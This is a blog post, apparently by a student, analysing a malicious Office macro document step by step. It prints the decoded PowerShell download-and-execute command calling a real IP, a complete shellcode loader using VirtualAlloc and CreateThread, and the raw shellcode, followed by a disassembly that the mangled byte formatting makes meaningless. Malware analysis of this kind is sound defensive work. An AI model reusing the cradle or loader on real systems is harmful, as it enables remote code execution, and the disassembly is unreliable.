Analyzing Iranian document [ 1st Stage ] as a practice

 Hello all, Finally I came back after months and I hope won't leave that field again.

Let's analyze the malicious document.


First: It's not a legitimate article so I hope it'll be well.

suppose you've got an email with a document and we want to make sure it's not malicious so what's the 1st step we will do?


We will analyze it by OfficeMalScanner tool cos I love it or any analyzing tool you prefer. so let's start.

 

 As you can , we use  info parameter to the OfficeMalScanner tool to extract the MACRO code if it exists.

And the BIN code in the last of figure, let's open it by NOTEPAD++

 

It's a Visual Basic code, you can chose it from Language bar to make it clear.

As you can see it declaring variables we can skip that part to find the important part.

Here is the most important part in that code, as you can see it's a base64encoding and we can decode it by any online tool or offline as you prefer.


So The attacker use that command:

powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://139.59.46.154:3485/eiloShaegae1'

  And The attacker ip is: 139.59.46.154 and the opened port: 3485 which located in Singapore.

 :and the second encoding code after decoding it we will get

$Qsc = '$zw5 = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

// It reserves a memory space for the shellcode

[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

// creating the threat to execute the shellcode

[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);

'';$w = Add-Type -memberDefinition $zw5 -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];

 

// The Shellcode itself

[Byte[]]$z = 0xdb,0xcd,0xd9,0x74,0x24,0xf4,0xba,0x62,0x93,0xaf,0x6c,0x5e,0x31,0xc9,0xb1,0x57,0x31,0x56,0x18,0x83,0xee,0xfc,0x03,0x56,0x76,0x71,0x5a,0x90,0x9e,0xf7,0xa5,0x69,0x5e,0x98,0x2c,0x8c,0x6f,0x98,0x4b,0xc4,0xdf,0x28,0x1f,0x88,0xd3,0xc3,0x4d,0x39,0x60,0xa1,0x59,0x4e,0xc1,0x0c,0xbc,0x61,0xd2,0x3d,0xfc,0xe0,0x50,0x3c,0xd1,0xc2,0x69,0x8f,0x24,0x02,0xae,0xf2,0xc5,0x56,0x67,0x78,0x7b,0x47,0x0c,0x34,0x40,0xec,0x5e,0xd8,0xc0,0x11,0x16,0xdb,0xe1,0x87,0x2d,0x82,0x21,0x29,0xe2,0xbe,0x6b,0x31,0xe7,0xfb,0x22,0xca,0xd3,0x70,0xb5,0x1a,0x2a,0x78,0x1a,0x63,0x83,0x8b,0x62,0xa3,0x23,0x74,0x11,0xdd,0x50,0x09,0x22,0x1a,0x2b,0xd5,0xa7,0xb9,0x8b,0x9e,0x10,0x66,0x2a,0x72,0xc6,0xed,0x20,0x3f,0x8c,0xaa,0x24,0xbe,0x41,0xc1,0x50,0x4b,0x64,0x06,0xd1,0x0f,0x43,0x82,0xba,0xd4,0xea,0x93,0x66,0xba,0x13,0xc3,0xc9,0x63,0xb6,0x8f,0xe7,0x70,0xcb,0xcd,0x6f,0xe9,0xb1,0x99,0x6f,0x9d,0x4e,0x0b,0x01,0x34,0xe5,0xa3,0x91,0xb1,0x23,0x33,0xd6,0xeb,0x1d,0xe0,0x7b,0x47,0x0d,0x45,0x28,0x0f,0x8b,0x3f,0xb7,0x68,0x14,0x6a,0x14,0x24,0x81,0x96,0xc9,0x99,0x3d,0xc2,0xfc,0x1d,0xbe,0x1c,0x72,0x1d,0xbe,0xdc,0xa5,0x2e,0xc9,0xec,0xf6,0x78,0x35,0x5d,0x60,0xd2,0xbc,0xc2,0xb6,0x23,0x6b,0x75,0xf0,0x8f,0xfc,0x86,0xce,0xcf,0x79,0xd5,0x7d,0x43,0xd5,0x89,0xd7,0x0b,0x32,0x78,0xf9,0xf0,0x3b,0x56,0x93,0x6d,0xce,0x06,0xf3,0xf1,0xfd,0xb8,0x03,0x7b,0xe1,0xd3,0x07,0x2b,0x88,0x3c,0x51,0xa3,0x39,0x05,0xc3,0xb5,0x3d,0x5c,0xa8,0xea,0x92,0x0c,0x18,0x65,0x38,0xb5,0xbc,0x0e,0xbd,0x6c,0x39,0x30,0x34,0x85,0x0e,0xc4,0x6e,0xf1,0x60,0x93,0x33,0x54,0x7f,0x09,0x59,0x19,0x17,0xb2,0x8e,0x99,0xe7,0xda,0xae,0x99,0xa7,0x1a,0xfc,0xf1,0x7f,0xbf,0x51,0xe7,0x80,0x6a,0xc6,0xb4,0x2d,0x1c,0x0e,0x6d,0xb9,0x1e,0xf1,0x92,0x39,0x4c,0xa7,0xfa,0x2b,0xe4,0xce,0x19,0xb4,0xdd,0x54,0x1d,0x3e,0x13,0xdd,0x99,0xbf,0x68,0x67,0x65,0xca,0x8b,0x30,0xa5,0x6b,0xbc,0xb4,0xd6,0x6c,0xc3,0x03,0x1c,0xbc,0x0b,0x5a,0x70,0xf1,0x41,0x9a,0xa2,0xc0,0x93,0xef,0xba;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$KMbD=$w::VirtualAlloc(0,0x1000,$g,0x40);

So here the shellcode after clearing it:

0xdb\x0xcd\x0xd9\x0x74\x0x24\x0xf4\x0xba\x0x62\x0x93\x0xaf\x0x6c\x0x5e\x0x31\x0xc9\x0xb1\x0x57\x0x31\x0x56\x0x18\x0x83\x0xee\x0xfc\x0x03\x0x56\x0x76\x0x71\x0x5a\x0x90\x0x9e\x0xf7\x0xa5\x0x69\x0x5e\x0x98\x0x2c\x0x8c\x0x6f\x0x98\x0x4b\x0xc4\x0xdf\x0x28\x0x1f\x0x88\x0xd3\x0xc3\x0x4d\x0x39\x0x60\x0xa1\x0x59\x0x4e\x0xc1\x0x0c\x0xbc\x0x61\x0xd2\x0x3d\x0xfc\x0xe0\x0x50\x0x3c\x0xd1\x0xc2\x0x69\x0x8f\x0x24\x0x02\x0xae\x0xf2\x0xc5\x0x56\x0x67\x0x78\x0x7b\x0x47\x0x0c\x0x34\x0x40\x0xec\x0x5e\x0xd8\x0xc0\x0x11\x0x16\x0xdb\x0xe1\x0x87\x0x2d\x0x82\x0x21\x0x29\x0xe2\x0xbe\x0x6b\x0x31\x0xe7\x0xfb\x0x22\x0xca\x0xd3\x0x70\x0xb5\x0x1a\x0x2a\x0x78\x0x1a\x0x63\x0x83\x0x8b\x0x62\x0xa3\x0x23\x0x74\x0x11\x0xdd\x0x50\x0x09\x0x22\x0x1a\x0x2b\x0xd5\x0xa7\x0xb9\x0x8b\x0x9e\x0x10\x0x66\x0x2a\x0x72\x0xc6\x0xed\x0x20\x0x3f\x0x8c\x0xaa\x0x24\x0xbe\x0x41\x0xc1\x0x50\x0x4b\x0x64\x0x06\x0xd1\x0x0f\x0x43\x0x82\x0xba\x0xd4\x0xea\x0x93\x0x66\x0xba\x0x13\x0xc3\x0xc9\x0x63\x0xb6\x0x8f\x0xe7\x0x70\x0xcb\x0xcd\x0x6f\x0xe9\x0xb1\x0x99\x0x6f\x0x9d\x0x4e\x0x0b\x0x01\x0x34\x0xe5\x0xa3\x0x91\x0xb1\x0x23\x0x33\x0xd6\x0xeb\x0x1d\x0xe0\x0x7b\x0x47\x0x0d\x0x45\x0x28\x0x0f\x0x8b\x0x3f\x0xb7\x0x68\x0x14\x0x6a\x0x14\x0x24\x0x81\x0x96\x0xc9\x0x99\x0x3d\x0xc2\x0xfc\x0x1d\x0xbe\x0x1c\x0x72\x0x1d\x0xbe\x0xdc\x0xa5\x0x2e\x0xc9\x0xec\x0xf6\x0x78\x0x35\x0x5d\x0x60\x0xd2\x0xbc\x0xc2\x0xb6\x0x23\x0x6b\x0x75\x0xf0\x0x8f\x0xfc\x0x86\x0xce\x0xcf\x0x79\x0xd5\x0x7d\x0x43\x0xd5\x0x89\x0xd7\x0x0b\x0x32\x0x78\x0xf9\x0xf0\x0x3b\x0x56\x0x93\x0x6d\x0xce\x0x06\x0xf3\x0xf1\x0xfd\x0xb8\x0x03\x0x7b\x0xe1\x0xd3\x0x07\x0x2b\x0x88\x0x3c\x0x51\x0xa3\x0x39\x0x05\x0xc3\x0xb5\x0x3d\x0x5c\x0xa8\x0xea\x0x92\x0x0c\x0x18\x0x65\x0x38\x0xb5\x0xbc\x0x0e\x0xbd\x0x6c\x0x39\x0x30\x0x34\x0x85\x0x0e\x0xc4\x0x6e\x0xf1\x0x60\x0x93\x0x33\x0x54\x0x7f\x0x09\x0x59\x0x19\x0x17\x0xb2\x0x8e\x0x99\x0xe7\x0xda\x0xae\x0x99\x0xa7\x0x1a\x0xfc\x0xf1\x0x7f\x0xbf\x0x51\x0xe7\x0x80\x0x6a\x0xc6\x0xb4\x0x2d\x0x1c\x0x0e\x0x6d\x0xb9\x0x1e\x0xf1\x0x92\x0x39\x0x4c\x0xa7\x0xfa\x0x2b\x0xe4\x0xce\x0x19\x0xb4\x0xdd\x0x54\x0x1d\x0x3e\x0x13\x0xdd\x0x99\x0xbf\x0x68\x0x67\x0x65\x0xca\x0x8b\x0x30\x0xa5\x0x6b\x0xbc\x0xb4\x0xd6\x0x6c\x0xc3\x0x03\x0x1c\x0xbc\x0x0b\x0x5a\x0x70\x0xf1\x0x41\x0x9a\x0xa2\x0xc0\x0x93\x0xef\x0xba


and after disassemble it online we get:

0:  0d b0 cd 0d 90          or     eax,0x900dcdb0
5:  74 02                   je     0x9
7:  40                      inc    eax
8:  f4                      hlt
9:  0b a0 62 09 30 af       or     esp,DWORD PTR [eax-0x50cff69e]
f:  06                      push   es
10: c0 5e 03 10             rcr    BYTE PTR [esi+0x3],0x10
14: c9                      leave
15: 0b 10                   or     edx,DWORD PTR [eax]
17: 57                      push   edi
18: 03 10                   add    edx,DWORD PTR [eax]
1a: 56                      push   esi
1b: 01 80 83 0e e0 fc       add    DWORD PTR [eax-0x31ff17d],eax
21: 00 30                   add    BYTE PTR [eax],dh
23: 56                      push   esi
24: 07                      pop    es
25: 60                      pusha
26: 71 05                   jno    0x2d
28: a0 90 09 e0 f7          mov    al,ds:0xf7e00990
2d: 0a 50 69                or     dl,BYTE PTR [eax+0x69]
30: 05 e0 98 02 c0          add    eax,0xc00298e0
35: 8c 06                   mov    WORD PTR [esi],es
37: f0 98                   lock cwde
39: 04 b0                   add    al,0xb0
3b: c4 0d f0 28 01 f0       les    ecx,FWORD PTR ds:0xf00128f0
41: 88 0d 30 c3 04 d0       mov    BYTE PTR ds:0xd004c330,cl
47: 39 06                   cmp    DWORD PTR [esi],eax
49: 00 a1 05 90 4e 0c       add    BYTE PTR [ecx+0xc4e9005],ah
4f: 10 0c 0b                adc    BYTE PTR [ebx+ecx*1],cl
52: c0 61 0d 20             shl    BYTE PTR [ecx+0xd],0x20
56: 3d 0f c0 e0 05          cmp    eax,0x5e0c00f
5b: 00 3c 0d 10 c2 06 90    add    BYTE PTR [ecx*1-0x6ff93df0],bh
62: 8f 02                   pop    DWORD PTR [edx]
64: 40                      inc    eax
65: 02 0a                   add    cl,BYTE PTR [edx]
67: e0 f2                   loopne 0x5b
69: 0c 50                   or     al,0x50
6b: 56                      push   esi
6c: 06                      push   es
6d: 70 78                   jo     0xe7
6f: 07                      pop    es
70: b0 47                   mov    al,0x47
72: 00 c0                   add    al,al
74: 34 04                   xor    al,0x4
76: 00 ec                   add    ah,ch
78: 05 e0 d8 0c 00          add    eax,0xcd8e0
7d: 11 01                   adc    DWORD PTR [ecx],eax
7f: 60                      pusha
80: db 0e                   fisttp DWORD PTR [esi]
82: 10 87 02 d0 82 02       adc    BYTE PTR [edi+0x282d002],al
88: 10 29                   adc    BYTE PTR [ecx],ch
8a: 0e                      push   cs
8b: 20 be 06 b0 31 0e       and    BYTE PTR [esi+0xe31b006],bh
91: 70 fb                   jo     0x8e
93: 02 20                   add    ah,BYTE PTR [eax]
95: ca 0d 30                retf   0x300d
98: 70 0b                   jo     0xa5
9a: 50                      push   eax
9b: 1a 02                   sbb    al,BYTE PTR [edx]
9d: a0 78 01 a0 63          mov    al,ds:0x63a00178
a2: 08 30                   or     BYTE PTR [eax],dh
a4: 8b 06                   mov    eax,DWORD PTR [esi]
a6: 20 a3 02 30 74 01       and    BYTE PTR [ebx+0x1743002],ah
ac: 10 dd                   adc    ch,bl
ae: 05 00 09 02 20          add    eax,0x20020900
b3: 1a 02                   sbb    al,BYTE PTR [edx]
b5: b0 d5                   mov    al,0xd5
b7: 0a 70 b9                or     dh,BYTE PTR [eax-0x47]
ba: 08 b0 9e 01 00 66       or     BYTE PTR [eax+0x6600019e],dh
c0: 02 a0 72 0c 60 ed       add    ah,BYTE PTR [eax-0x129ff38e]
c6: 02 00                   add    al,BYTE PTR [eax]
c8: 3f                      aas
c9: 08 c0                   or     al,al
cb: aa                      stos   BYTE PTR es:[edi],al
cc: 02 40 be                add    al,BYTE PTR [eax-0x42]
cf: 04 10                   add    al,0x10
d1: c1 05 00 4b 06 40 06    rol    DWORD PTR ds:0x40064b00,0x6
d8: 0d 10 0f 04 30          or     eax,0x30040f10
dd: 82 0b a0                or     BYTE PTR [ebx],0xa0
e0: d4 0e                   aam    0xe
e2: a0 93 06 60 ba          mov    al,ds:0xba600693
e7: 01 30                   add    DWORD PTR [eax],esi
e9: c3                      ret
ea: 0c 90                   or     al,0x90
ec: 63 0b                   arpl   WORD PTR [ebx],cx
ee: 60                      pusha
ef: 8f                      (bad)
f0: 0e                      push   cs
f1: 70 70                   jo     0x163
f3: 0c b0                   or     al,0xb0
f5: cd 06                   int    0x6
f7: f0 e9 0b 10 99 06       lock jmp 0x6991108
fd: f0 9d                   lock popf
ff: 04 e0                   add    al,0xe0
101:    0b 00                   or     eax,DWORD PTR [eax]
103:    10 34 0e                adc    BYTE PTR [esi+ecx*1],dh
106:    50                      push   eax
107:    a3 09 10 b1 02          mov    ds:0x2b11009,eax
10c:    30 33                   xor    BYTE PTR [ebx],dh
10e:    0d 60 eb 01 d0          or     eax,0xd001eb60
113:    e0 07                   loopne 0x11c
115:    b0 47                   mov    al,0x47
117:    00 d0                   add    al,dl
119:    45                      inc    ebp
11a:    02 80 0f 08 b0 3f       add    al,BYTE PTR [eax+0x3fb0080f]
120:    0b 70 68                or     esi,DWORD PTR [eax+0x68]
123:    01 40 6a                add    DWORD PTR [eax+0x6a],eax
126:    01 40 24                add    DWORD PTR [eax+0x24],eax
129:    08 10                   or     BYTE PTR [eax],dl
12b:    96                      xchg   esi,eax
12c:    0c 90                   or     al,0x90
12e:    99                      cdq
12f:    03 d0                   add    edx,eax
131:    c2 0f c0                ret    0xc00f
134:    1d 0b e0 1c 07          sbb    eax,0x71ce00b
139:    20 1d 0b e0 dc 0a       and    BYTE PTR ds:0xadce00b,bl
13f:    50                      push   eax
140:    2e 0c 90                cs or  al,0x90
143:    ec                      in     al,dx
144:    0f 60 78 03             punpcklbw mm7,DWORD PTR [eax+0x3]
148:    50                      push   eax
149:    5d                      pop    ebp
14a:    06                      push   es
14b:    00 d2                   add    dl,dl
14d:    0b c0                   or     eax,eax
14f:    c2 0b 60                ret    0x600b
152:    23 06                   and    eax,DWORD PTR [esi]
154:    b0 75                   mov    al,0x75
156:    0f 00 8f 0f c0 86 0c    str    WORD PTR [edi+0xc86c00f]
15d:    e0 cf                   loopne 0x12e
15f:    07                      pop    es
160:    90                      nop
161:    d5 07                   aad    0x7
163:    d0 43 0d                rol    BYTE PTR [ebx+0xd],1
166:    50                      push   eax
167:    89 0d 70 0b 03 20       mov    DWORD PTR ds:0x20030b70,ecx
16d:    78 0f                   js     0x17e
16f:    90                      nop
170:    f0 03 b0 56 09 30 6d    lock add esi,DWORD PTR [eax+0x6d300956]
177:    0c e0                   or     al,0xe0
179:    06                      push   es
17a:    0f 30                   wrmsr
17c:    f1                      icebp
17d:    0f d0                   (bad)
17f:    b8 00 30 7b 0e          mov    eax,0xe7b3000
184:    10 d3                   adc    bl,dl
186:    00 70 2b                add    BYTE PTR [eax+0x2b],dh
189:    08 80 3c 05 10 a3       or     BYTE PTR [eax-0x5ceffac4],al
18f:    03 90 05 0c 30 b5       add    edx,DWORD PTR [eax-0x4acff3fb]
195:    03 d0                   add    edx,eax
197:    5c                      pop    esp
198:    0a 80 ea 09 20 0c       or     al,BYTE PTR [eax+0xc2009ea]
19e:    01 80 65 03 80 b5       add    DWORD PTR [eax-0x4a7ffc9b],eax
1a4:    0b c0                   or     eax,eax
1a6:    0e                      push   cs
1a7:    0b d0                   or     edx,eax
1a9:    6c                      ins    BYTE PTR es:[edi],dx
1aa:    03 90 30 03 40 85       add    edx,DWORD PTR [eax-0x7abffcd0]
1b0:    00 e0                   add    al,ah
1b2:    c4 06                   les    eax,FWORD PTR [esi]
1b4:    e0 f1                   loopne 0x1a7
1b6:    06                      push   es
1b7:    00 93 03 30 54 07       add    BYTE PTR [ebx+0x7543003],dl
1bd:    f0 09 05 90 19 01 70    lock or DWORD PTR ds:0x70011990,eax
1c4:    b2 08                   mov    dl,0x8
1c6:    e0 99                   loopne 0x161
1c8:    0e                      push   cs
1c9:    70 da                   jo     0x1a5
1cb:    0a e0                   or     ah,al
1cd:    99                      cdq
1ce:    0a 70 1a                or     dh,BYTE PTR [eax+0x1a]
1d1:    0f c0 f1                xadd   cl,dh
1d4:    07                      pop    es
1d5:    f0 bf 05 10 e7 08       lock mov edi,0x8e71005
1db:    00 6a 0c                add    BYTE PTR [edx+0xc],ch
1de:    60                      pusha
1df:    b4 02                   mov    ah,0x2
1e1:    d0 1c 00                rcr    BYTE PTR [eax+eax*1],1
1e4:    e0 6d                   loopne 0x253
1e6:    0b 90 1e 0f 10 92       or     edx,DWORD PTR [eax-0x6deff0e2]
1ec:    03 90 4c 0a 70 fa       add    edx,DWORD PTR [eax-0x58ff5b4]
1f2:    02 b0 e4 0c e0 19       add    dh,BYTE PTR [eax+0x19e00ce4]
1f8:    0b 40 dd                or     eax,DWORD PTR [eax-0x23]
1fb:    05 40 1d 03 e0          add    eax,0xe0031d40
200:    13 0d d0 99 0b f0       adc    ecx,DWORD PTR ds:0xf00b99d0
206:    68 06 70 65 0c          push   0xc657006
20b:    a0 8b 03 00 a5          mov    al,ds:0xa500038b
210:    06                      push   es
211:    b0 bc                   mov    al,0xbc
213:    0b 40 d6                or     eax,DWORD PTR [eax-0x2a]
216:    06                      push   es
217:    c0 c3 00                rol    bl,0x0
21a:    30 1c 0b                xor    BYTE PTR [ebx+ecx*1],bl
21d:    c0 0b 05                ror    BYTE PTR [ebx],0x5
220:    a0 70 0f 10 41          mov    al,ds:0x41100f70
225:    09 a0 a2 0c 00 93       or     DWORD PTR [eax-0x6cfff35e],esp
22b:    0e                      push   cs
22c:    f0                      lock
22d:    ba                      .byte 0xba 

 

Or you can see here:

https://defuse.ca/online-x86-assembler.htm#disassembly2

 

we will discuss it later after learning more so we just analyze the malicious document only.

 

for ($i=0;$i -le ($z.Length-1);$i++) {

$w::memset([IntPtr]($KMbD.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$KMbD,0,0,0);

for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Qsc));

$wYc = "-e ";

if([IntPtr]::Size -eq 8){

$bgsQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $bgsQ $wYc $e"

}else{;iex "& powershell $wYc $e";}


so here it execusting the shell code.



Today, we learned How to analyze the Malicious document and getting usful info from the macro code.

so we will discuss more later.

salam

Comments

Post a Comment

Popular posts from this blog

My first write up for Joanap malware

Image
Hello all, My name's Mahmoud NourEldin a Student of maltrak.com which presented by Eng: Amr Thabet and I would like to post my first blog about this topic. It just an exercise from maltrak course and I would like to share the analyzing with you. Let's start: What is Joanap Malware ? Joanap is a remote access tool that is a type of malware used by the government of North Korea . It is two-stage malware, meaning it is "dropped" by another software (in this case the Brambul worm, which was part of the charges against Park Jin Hyok in 2018). [1] Joanap establishes peer-to-peer communications and is used to manage botnets that can enable other operations. On Windows devices that have been compromised it allows data exfiltration , to drop and run secondary payloads , initialization of proxy communications, file management, process management, creation/deletion of directories, and node management.[Wikipedia]. Summary: It drops C:\WINDOWS\system32\scardprv.dll (MD...
Read more